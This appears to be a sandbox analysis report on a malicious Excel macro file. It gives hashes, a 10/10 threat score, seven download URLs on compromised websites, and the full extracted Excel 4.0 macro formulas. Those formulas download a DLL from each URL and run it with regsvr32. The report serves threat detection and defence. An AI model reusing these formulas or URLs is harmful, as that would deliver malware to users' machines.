Overview

overview

10

Static

static

10

5df125e34d...1.xlsm

windows7-x64

10

5df125e34d...1.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1

  • Size

    20KB

  • Sample

    241120-gbl4sssgrj

  • MD5

    ec54c5a515df08c95080df4bd69b8b47

  • SHA1

    f6895f5c64dff0303e27fdebfcc93b6f18ae68aa

  • SHA256

    5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1

  • SHA512

    c4d29545642e952f012e0d17747ac95e961bed0ecccf58637222c9059ea760ebb6a4d43d3837265572cb3ad33b4445bf28f662e5c9606c4b0579643845eb3dcc

  • SSDEEP

    384:0HTyVb1GNjyo4CGzPd6ZIwGdKb5CzgObff9kC+xbX7zUSA:guIN+o4FLYCBn9kC+xbLzK

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://osmani.atwebpages.com/wp-content/Ynwrr/

https://50-50aravidis.gr/thesi/wmL/

https://amplamaisbeneficios.com.br/contratos/MWnnZG/

http://bcingenieria.es/phpmailer/Z7fmcI7Va/

http://bredabeeld.nl/OLD/eavGp2KOdwXT/

http://www.cagataygunes.com.tr/stylesheets/uqK4kfhG4RAuRIA2/

http://kogelvanger.nl/picture_library/1MNqKan2FhWtQg5Uacu/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://osmani.atwebpages.com/wp-content/Ynwrr/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://50-50aravidis.gr/thesi/wmL/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://amplamaisbeneficios.com.br/contratos/MWnnZG/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bcingenieria.es/phpmailer/Z7fmcI7Va/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bredabeeld.nl/OLD/eavGp2KOdwXT/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cagataygunes.com.tr/stylesheets/uqK4kfhG4RAuRIA2/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kogelvanger.nl/picture_library/1MNqKan2FhWtQg5Uacu/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://osmani.atwebpages.com/wp-content/Ynwrr/
xlm40.dropper

https://50-50aravidis.gr/thesi/wmL/
xlm40.dropper

https://amplamaisbeneficios.com.br/contratos/MWnnZG/

Targets

    • Target

      5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1

    • Size

      20KB

    • MD5

      ec54c5a515df08c95080df4bd69b8b47

    • SHA1

      f6895f5c64dff0303e27fdebfcc93b6f18ae68aa

    • SHA256

      5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1

    • SHA512

      c4d29545642e952f012e0d17747ac95e961bed0ecccf58637222c9059ea760ebb6a4d43d3837265572cb3ad33b4445bf28f662e5c9606c4b0579643845eb3dcc

    • SSDEEP

      384:0HTyVb1GNjyo4CGzPd6ZIwGdKb5CzgObff9kC+xbX7zUSA:guIN+o4FLYCBn9kC+xbLzK

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks